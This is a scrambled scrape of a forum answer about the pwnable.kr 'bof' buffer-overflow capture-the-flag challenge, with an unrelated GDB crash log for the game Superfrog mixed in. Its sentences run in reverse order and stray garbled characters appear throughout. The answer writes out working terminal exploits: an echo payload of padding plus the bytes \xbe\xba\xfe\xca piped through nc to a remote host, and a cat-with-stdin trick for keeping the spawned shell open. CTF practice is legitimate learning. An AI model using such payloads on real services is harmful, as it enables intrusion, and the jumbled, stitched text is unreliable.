Program received signal SIGABRT, Aborted. *** stack smashing detected ***: /SteamApps/common/Superfrog/bin/Superfrog terminated Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Starting program: /SteamApps/common/Superfrog/bin/Superfrog Reading symbols from /SteamApps/common/Superfrog/bin/Superfrog.(no debugging symbols found).done. This GDB was configured as "x86_64-linux-gnu".įor bug reporting instructions, please see: There is NO WARRANTY, to the extent permitted by law. This is free software: you are free to change and redistribute it. License GPLv3+: GNU GPL version 3 or later Anyway, here it is:Ĭopyright (C) 2013 Free Software Foundation, Inc. Since there is no debugging symbols for the superfrog executable, the stack trace isn't *very* helpful by itself. Hope this info will help other confused souls as it did help me a while ago.Here is a bit more information about the crash. You can try typing shell commands, such as cat flag, or touch /tmp/pwned or whatever you like. (Note the - after payload.bin, after cat is done outputting contents of payload.bin, it will start outputting whatever comes in via stdin)Īnd voila! Now you are actually in. Next, we run the following command: cat payload.bin - | nc pwnable.kr 9000 To prove it, here's a slightly longer version of the terminal exploit, which actually works: echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbe\xba\xfe\xca\x0a" > payload.binįirst, we save the exact payload as before, to a file named payload.bin in this case. Python doesn't close the stream, while the terminal version does. The reason why Python works and the echo command doesn't, is continuity. bin/sh has no input, so execution continues to the next line, until the stack protector kicks in. The reason for this, is that we are sending the correct payload, but then we are stopping. However, we still get greeted by the error. It sends a bunch of characters to the stdin of the remote process, in the hopes of running /bin/sh. Think about the command above, for a moment. *** stack smashing detected ***: /home/bof/bof terminated overflow me :
With that in mind, one's natural attempt would be something like below: echo -e "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xbe\xba\xfe\xca\x0a" | nc pwnable.kr 9000Īfter all, this is an exact replica of the code above in Python, right? Except, the server begs to differ:
IMO Python is always preferred for better automation, but sometimes you just wanna have a quick exploit done without extra tools. However, I wanted to give an alternative answer without Python, but from the terminal. The answer from Jason is the correct solution.
0 kommentar(er)
